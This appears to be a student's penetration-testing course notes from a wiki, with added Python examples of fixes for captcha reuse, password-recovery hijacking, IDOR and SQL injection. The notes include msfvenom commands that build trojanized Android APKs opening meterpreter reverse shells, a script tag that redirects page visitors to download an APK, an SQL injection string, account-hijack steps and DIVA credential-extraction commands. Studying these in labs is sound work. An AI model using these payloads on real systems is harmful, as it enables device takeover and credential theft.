dardan:cyberacademy:module-7-web_application_pentesting
Tamper Data, Burp Suite
md5sum filename
captcha bypass: it gets bypassed by not writing the captcha at all; the captcha is stored in cookies; it validates one captcha and then uses the same captcha every time in that session; the captcha is found to be repeating
== threats to a pharmaceutical company ==
-government/regulations
-criminal organizations
-competition
-Chinese APT
-unfair market
-blackmail
-insider threats
mobile front: XML
mobile API: Android, iOS, BlackBerry
logging: ELK stack, Splunk, QRadar, GFI, SolarWinds
databases: MS SQL, MySQL, Oracle, DB2 etc.
backend: PHP, ASP, Python etc.
middleware
front end
== threat actors in the case of a news media ==
politics
competition
black hats
availability, reputation, market share
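The captcha note above describes a server that keeps accepting the same solved captcha for the rest of the session (or trusts one kept in a cookie). The following is an added example, not code from the course or from this page, showing the weak pattern next to the fixed one: the hardened store keeps challenges server-side, consumes each one on its first verification attempt (right or wrong) and expires it. The secret, the challenge ids and the answers are constructed for the demo.

```python
import hashlib
import hmac
import secrets
import time

# Constructed demo secret; a real deployment loads this from configuration.
SERVER_SECRET = b"constructed-demo-secret"


def _answer_mac(challenge_id, answer):
    """Keyed hash of the expected answer; only this hash is kept server-side."""
    msg = challenge_id.encode() + b"|" + answer.strip().lower().encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


class ReusableCaptchaStore:
    """The weak pattern from the notes: a solved challenge stays valid, so one
    correct answer can be replayed for every request in the session."""

    def __init__(self):
        self._pending = {}  # challenge_id -> expected MAC

    def issue(self, answer):
        cid = secrets.token_hex(16)
        self._pending[cid] = _answer_mac(cid, answer)
        return cid

    def verify(self, cid, answer):
        expected = self._pending.get(cid)  # BUG: the entry is never removed after use
        return expected is not None and hmac.compare_digest(expected, _answer_mac(cid, answer))


class OneTimeCaptchaStore:
    """Hardened form: every challenge is consumed on its first verification
    attempt, expires after ttl_seconds, and lives server-side rather than in a
    client-controlled cookie."""

    def __init__(self, ttl_seconds=300):
        self.ttl = ttl_seconds
        self._pending = {}  # challenge_id -> (expected MAC, issued_at)

    def issue(self, answer):
        cid = secrets.token_hex(16)
        self._pending[cid] = (_answer_mac(cid, answer), time.time())
        return cid

    def verify(self, cid, answer):
        entry = self._pending.pop(cid, None)  # consumed whether or not the answer is right
        if entry is None:
            return False
        expected, issued_at = entry
        if time.time() - issued_at > self.ttl:
            return False
        return hmac.compare_digest(expected, _answer_mac(cid, answer))


if __name__ == "__main__":
    weak = ReusableCaptchaStore()
    cid = weak.issue("x7k2")
    print("reusable:", weak.verify(cid, "x7k2"), weak.verify(cid, "x7k2"))  # True True
    strong = OneTimeCaptchaStore()
    cid = strong.issue("x7k2")
    print("one-time:", strong.verify(cid, "x7k2"), strong.verify(cid, "x7k2"))  # True False
```

A test for the repeating-captcha finding is exactly the second call in each pair: if the same challenge id still verifies after a successful submit, the store is of the reusable kind.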
REMEDIATION
Insecure Direct Object Reference (IDOR)
172.16.60.85
172.16.60.88
Download Nessus from here. Choose the Ubuntu packages (or the Debian ones)
Open a Terminal and go to the download directory (cd)
Run sudo dpkg -i Nessus*.deb. Enter root password.
Start it: sudo /etc/init.d/nessusd start
Open a browser and go to https://localhost:8834/
17.10.2018
Broken Authentication
Password recovery function
modify the email where the OTP is sent to an email we have access to
open the email
it asks to open a new mail
create an email
replace it with the created email
intercept the request and put in the new email
the function finds the email and opens it
it sends the confirmation; it has to be told where to send the confirmation
modify this confirmation with the new email and the confirmation goes to the new email
every email in the Facebook database is a new unique ID
this works only with new emails
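The recovery flow above works because the destination of the confirmation is taken from the request. The following is an added example, not code from the course or from this page, of a recovery handler that takes the destination only from the user record and binds the token to that address with an HMAC, so a client-supplied email field is ignored and the token stops verifying if the address on record changes. The user table, the secret and the form fields are constructed for the demo.

```python
import hashlib
import hmac
import secrets
import time

SERVER_SECRET = b"constructed-demo-secret"  # assumption: loaded from config in practice

# Constructed user table: only the address on record may receive recovery mail.
USERS = {"jack": {"email": "jack@example.com"}}


def _mac(username, email_on_record, nonce, issued):
    """Keyed hash over the user, the address on record and the issue time."""
    msg = "|".join([username, email_on_record, nonce, issued]).encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def request_recovery(form):
    """Handles the 'forgot password' form. The destination address comes from
    the user record, never from the request, so an 'email' field sent by the
    client has no effect on where the confirmation goes."""
    username = form.get("username", "")
    user = USERS.get(username)
    if user is None:
        return {"sent_to": None, "token": None}  # same response shape as success
    nonce = secrets.token_hex(8)
    issued = str(int(time.time()))
    mac = _mac(username, user["email"], nonce, issued)
    token = "|".join([username, nonce, issued, mac])
    return {"sent_to": user["email"], "token": token}


def confirm_recovery(token, max_age=900):
    """Returns the username the token is valid for, or None. Because the MAC
    covers the address on record at issue time, the token dies if that address
    is changed afterwards, and any edit to the token breaks the MAC."""
    try:
        username, nonce, issued, mac = token.split("|")
    except ValueError:
        return None
    user = USERS.get(username)
    if user is None:
        return None
    expected = _mac(username, user["email"], nonce, issued)
    if not hmac.compare_digest(mac, expected):
        return None
    if time.time() - int(issued) > max_age:
        return None
    return username


if __name__ == "__main__":
    resp = request_recovery({"username": "jack", "email": "other@example.com"})
    print("confirmation sent to:", resp["sent_to"])  # jack@example.com
    print("token valid for:", confirm_recovery(resp["token"]))  # jack
```

The address in the request is deliberately never read; the response for an unknown user has the same shape as a success so the endpoint does not reveal which usernames exist.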
sql injection
sensitive data export
bypass Cloudflare
try to find subdomains
find misconfigurations
look at the domain history (what it had before going behind Cloudflare); it is recommended to change the IP before going behind CF
brute-force subdomains; it is recommended to put all subdomains behind it
a full path in the URL shows what can be hacked on that server
XML and XXE attack
bypass WAF
check for encoders
check for SQL injection with "
for symbols '
Security Misconfiguration
NAT all port nat to one port
SSH open
admin page open to external
device console unprotected
19.10.2018 absent
22.10.2018
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.65.141 LPORT=9999 R> king2.apk
insert into index.html:
<script>
window.location.assign("update.apk");
</script>
test with Android by uploading a malware in Android and meterpreter to manage the session; when someone visits the page they get redirected to update.apk; mitmf ???
24.10.2018 absent
26.10.2018
msfvenom -x flashlight.apk -p android/meterpreter/reverse_tcp LHOST=172.16.60.69 LPORT=9559 R> flash-light.apk
29.10.2018
import requests  # the module is "requests"; "request" does not exist

# form fields expected by the /dotransfer endpoint
payload = {"username": "jack", "password": "P@ssw0rd", "from_acc": "5555555", "to_acc": "999999", "amount": "10"}
r = requests.post("http://127.0.0.1:8888/dotransfer", data=payload)
print(r.text)
python sendMN.py
### test if we can view account state
/getaccounts
nano getA.py
import requests

# form fields expected by the /getaccounts endpoint
payload = {"username": "dinesh", "password": "P@ssw0rd"}
r = requests.post("http://127.0.0.1:8888/getaccounts", data=payload)
print(r.text)
with Burp we validate the changepassword request
intercept the request when you have changed the password
nano changePassword.py
import requests

# form fields expected by the /changepassword endpoint
payload = {"username": "jack", "newpassword": "Password"}
r = requests.post("https://127.0.0.1:8888/changepassword", data=payload)
print(r.text)
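The three scripts above send a username, a from_acc and a newpassword straight to the server; the IDOR remediation section earlier on the page names the fix but gives no code. The following is an added example, not code from the course or from the test bank application, of what the three handlers look like with the missing checks: every handler re-authenticates, /dotransfer refuses a from_acc the caller does not own, /getaccounts lists only the caller's accounts, and /changepassword demands the current password and only changes the caller's own entry. The users, accounts and balances are constructed; passwords are stored in clear only to keep the demo short.

```python
import hmac

# Constructed state; reset_state() rebuilds it so the demo can be re-run.
USERS = {}
ACCOUNTS = {}


def reset_state():
    USERS.clear()
    USERS.update({"jack": "P@ssw0rd", "dinesh": "P@ssw0rd"})
    ACCOUNTS.clear()
    ACCOUNTS.update({
        "5555555": {"owner": "jack", "balance": 100},
        "999999": {"owner": "dinesh", "balance": 50},
    })


class AuthError(Exception):
    pass


def authenticate(form):
    """The username in the form is only trusted once the password matches."""
    username = form.get("username", "")
    stored = USERS.get(username)
    supplied = form.get("password", "")
    if stored is None or not hmac.compare_digest(stored.encode(), supplied.encode()):
        raise AuthError("bad credentials")
    return username


def do_transfer(form):
    """/dotransfer with an ownership check on from_acc: the IDOR remediation."""
    user = authenticate(form)
    src = ACCOUNTS.get(form.get("from_acc"))
    dst = ACCOUNTS.get(form.get("to_acc"))
    if src is None or dst is None:
        raise ValueError("unknown account")
    if src["owner"] != user:  # the request may name any account; the caller may only debit its own
        raise AuthError("from_acc is not owned by the authenticated user")
    amount = int(form.get("amount", "0"))
    if amount <= 0 or amount > src["balance"]:
        raise ValueError("invalid amount")
    src["balance"] -= amount
    dst["balance"] += amount
    return src["balance"]


def get_accounts(form):
    """/getaccounts returns only the caller's own accounts."""
    user = authenticate(form)
    return {acc: info["balance"] for acc, info in ACCOUNTS.items() if info["owner"] == user}


def change_password(form):
    """/changepassword requires the current password and never takes a target
    user from the request: it changes the authenticated user's own entry."""
    user = authenticate(form)
    new = form.get("newpassword", "")
    if len(new) < 8:
        raise ValueError("new password too short")
    USERS[user] = new
    return True


reset_state()

if __name__ == "__main__":
    print(do_transfer({"username": "jack", "password": "P@ssw0rd",
                       "from_acc": "5555555", "to_acc": "999999", "amount": "10"}))  # 90
    try:
        do_transfer({"username": "dinesh", "password": "P@ssw0rd",
                     "from_acc": "5555555", "to_acc": "999999", "amount": "10"})
    except AuthError as exc:
        print("blocked:", exc)
```

The changepassword script on the page would now fail with a bad-credentials error, because it sends no current password; that is the behaviour an intercepted request should produce.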
adb shell
adb pull
adb push
pm list package
am start -n
am start -n com.android.insecurebankv2/.Postlogin
am start -n jakhar.aseem.diva
apktool d <name>
31.10.2018 choose one .. exploit it and document it
## insecure logging ##
1. insecure logging: check out by writing a CC number and see whether you can see the CC number with the command below:
adb logcat | grep credit
if you see the plain-text CC number, this means it is vulnerable.
2. apktool d diva.apk -o diva-extracted; in the extracted folder: cat HardcodeActivity.smali
3. insecure data storage - part1: adb shell (be sure the OS is rooted); create user/pass; su (to get root access); cd /data/data/jakhar.aseem.diva/shared_prefs; ls; cat *.xml :) you will see user and pass in plain text
4. adb shell; create user/pass; cd /data/data/jakhar.aseem.diva/; ls; then cd databases; ids2 chosen; adb pull /data/data/jakhar.aseem.diva/databases/ids2; file ids2 (sqlite3 is found); sqlite3 ids2; .tables; select * from myuser;
5. adb shell; create user/pass; cd /data/data/jakhar.aseem.diva/; when the user is created a file named uinfo23423j2tmp appears; cat uinfo23423j2tmp :) you will see the user/pass created in the app
6. adb shell; grant storage access for the diva app; create user/pass; cd /mnt/sdcard; cat .uinfo.txt :) you will see the user/pass created in the app
7. search 1'or'1'='1 : this will query for all users in the database
8. view a URL, e.g. https://www.google.com; then you will be able to view or move through directories, e.g. file:// or file://etc/filename, file:///etc/hosts
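Item 7 above and the earlier "check for SQL injection with " / for symbols '" notes rely on the same defect: the search term is pasted into the SQL text. The following is an added example, not code from DIVA or from this page, that rebuilds a small myuser table in an in-memory SQLite database and runs the vulnerable concatenated query next to the parameterized one, so the 1'or'1'='1 result and the single-quote error can be reproduced offline. The table contents are constructed.

```python
import sqlite3


def make_db():
    """Constructed table mirroring the exercise's 'select * from myuser'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE myuser (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO myuser VALUES (?, ?)",
                     [("alice", "a1"), ("bob", "b2"), ("carol", "c3")])
    return conn


def search_vulnerable(conn, name):
    """Builds the query by string concatenation: the pattern behind item 7.
    With name = 1'or'1'='1 the WHERE clause becomes user = '1' or '1'='1',
    which is true for every row."""
    sql = "SELECT user FROM myuser WHERE user = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, name):
    """Hardened form: the value travels separately from the SQL text, so the
    quote characters are just part of the string being compared."""
    rows = conn.execute("SELECT user FROM myuser WHERE user = ?", (name,))
    return [row[0] for row in rows]


def probe(conn, search, value):
    """Reproduces the quote checks from the notes: returns ('error', message)
    when the input broke the SQL, else ('rows', result). A database error on a
    lone ' is the indicator the notes look for; the parameterized query never
    produces one."""
    try:
        return ("rows", search(conn, value))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    print(search_vulnerable(conn, "1'or'1'='1"))     # ['alice', 'bob', 'carol']
    print(search_parameterized(conn, "1'or'1'='1"))  # []
    print(probe(conn, search_vulnerable, "bob'"))     # ('error', ...)
    print(probe(conn, search_parameterized, "bob'"))  # ('rows', [])
```

The double-quote check from the notes does not error here because " is not a string delimiter inside a single-quoted SQLite literal; the single quote is the one that breaks the concatenated query, which is why both are tried.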
dardan/cyberacademy/module-7-web_application_pentesting.txt · Last modified: 2018/10/31 20:00 by dardan
